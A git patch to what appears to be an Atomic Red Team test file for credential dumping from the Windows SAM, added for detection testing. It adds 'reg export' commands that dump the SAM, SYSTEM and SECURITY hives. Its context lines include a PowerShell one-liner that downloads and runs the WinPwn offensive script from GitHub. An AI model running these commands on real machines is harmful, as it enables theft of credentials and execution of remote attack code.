From 600767fccabe383fb7f942e20c0bc83e042247a7 Mon Sep 17 00:00:00 2001
From: NeuralGlitch <107919127+NagaSivaGunturu@users.noreply.github.com>
Date: Fri, 5 Jul 2024 22:16:48 +0530
Subject: [PATCH] Update T1003.002.yaml (#2826)

new atomic test added

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1003.002/T1003.002.yaml | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)

diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml
index 5b7ea970..2da85875 100644
--- a/atomics/T1003.002/T1003.002.yaml
+++ b/atomics/T1003.002/T1003.002.yaml
@@ -172,3 +172,21 @@ atomic_tests:
       iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
       samfile -consoleoutput -noninteractive  
     name: powershell
+
+- name: Dumping of SAM, creds, and secrets(Reg Export)
+  description: |
+    Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Used reg export to execute this behavior
+    Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg export HKLM\sam %temp%\sam
+      reg export HKLM\system %temp%\system
+      reg export HKLM\security %temp%\security
+    cleanup_command: |
+      del %temp%\sam >nul 2> nul
+      del %temp%\system >nul 2> nul
+      del %temp%\security >nul 2> nul
+    name: command_prompt
+    elevation_required: true